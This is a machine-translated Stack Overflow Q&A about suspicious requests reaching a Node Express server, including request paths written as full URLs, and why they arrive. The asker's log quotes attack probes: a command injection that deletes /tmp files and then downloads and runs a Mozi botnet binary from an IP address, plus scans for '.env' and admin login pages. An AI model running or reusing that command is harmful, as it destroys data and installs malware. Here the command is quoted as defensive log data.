高速公路req.url路径如何成为另一个url?
高速公路req.url路径如何成为另一个url?
提问于 2021-08-31 15:43:33
最近,我发现正在向我的节点快速服务器发出可疑请求。所以我编写了一个中间件来记录请求urls。是否记录了许多可疑的请求路径,其中大多数以“/”开头,但是有些路径实际上是另一个url。这怎么可能在明示请求?我试着搜索这个,但什么也没找到。这些请求是否会危及节点服务器的安全性。(例如,req.url显示为http://icanhazip.com/ )
我的log.txt文件
/wp-content/
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
/shell?cd+/tmp;rm+-rf+*;wget+http://AN_IP_WAS_HERE:40222/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
/.env
/.env
http://example.com/<-- how is this possible in express request ?
/boaform/admin/formLogin
http://icanhazip.com/ <-- how is this possible in express request ?用于记录请求的代码
app.use((req,res,next) => {
var isvalid = true;
//some validation code here
if(!isvalid){
fs.appendFileSync("./log.txt", "\r\n"+ req.url);
res.send("...");
} else next();
});回答 1
Stack Overflow用户
回答已采纳
发布于 2021-08-31 15:56:55
在快速请求中这是怎么可能的?
一个非常基本的HTTP请求如下所示:
GET /your/path HTTP/1.1任何正常的客户都会在那里找到一条明智的道路。
如果您正在编写自己的客户端,或者手工构建请求(例如,键入连接到HTTP端口的telnet客户端),那么您可以在那里编写您喜欢的任何内容:
GET http://example.com/ HTTP/1.1可能会损害节点服务器的安全性。
一般不会。他们正在寻找一个可以利用的安全漏洞。不要用用户输入来做不安全的事情,要及时更新您所依赖的模块的安全补丁,这样您就会没事的。
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://stackoverflow.com/questions/69001693
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号